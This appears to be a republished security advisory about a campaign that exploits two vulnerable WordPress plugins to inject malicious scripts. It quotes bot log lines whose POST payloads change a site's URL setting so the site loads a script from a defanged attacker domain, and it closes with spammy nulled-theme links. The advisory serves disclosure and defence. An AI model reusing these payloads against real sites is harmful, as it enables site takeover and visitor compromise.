Cyber Attack | Data Breach Scammer steals over a million from Google and FB | Avast

Published on April 25th, 2019 📆 | 5825 Views ⚑

0

Plugins Added to Malicious Campaign

We continue to see an increase in the number of plugins attacked as part of a campaign that’s been active for quite a long time. Bad actors have added more vulnerable plugins to inject similar malicious scripts.

Plugins Added to the Attack

  • Download WP Inventory Manager (version < = 1.8.2)
  • Woocommerce User Email Verification.  (version < = 3.3.0  **Still Not Fixed**)

Attackers are trying to exploit vulnerable versions of these plugins. Public exploits already exist for all of the components listed above, and we highly encourage you to keep your software up to date to prevent any infection.

Payloads Used by Bots

  • Download WP Inventory Manager  
51.15.147.147 - action=save&siteurl=hxxps%3A%2F%2Fcdn.deliverymoretimes[.]info%2Fcdn.js%3Fty%3D1%26 [25/Apr/2019:05:14:28 +0000] "POST /wp-admin/admin-post.php?page=wpim_manage_settings HTTP/1.1" 200 5 "-" "-"
  • Woocommerce User Email Verification
51.15.147.147 - wuev_form_type=siteurl&hxxps://cdn.deliverymoretimes[.]info/simpletype.js?ty=1& [25/Apr/2019:05:14:28 +0000] "POST /wp-admin/admin-post.php HTTP/1.1" 200 5 "-" "-"

Malicious Domains Injected So far

hxxps://cdn[.]deliverymoretimes[.]info/simpletype[.]js?ty=1

As always, we recommend adding a WAF as a second layer of protection. If you are using the plugin Woocommerce User Email Verification, it should be removed since the developer hasn’t fixed the “arbitrary options update”.

Source link

Free Download WordPress Themes
Download Best WordPress Themes Free Download
Download Nulled WordPress Themes
Download Premium WordPress Themes Free
free online course

Tagged with:



Leave a Reply ✍


loading...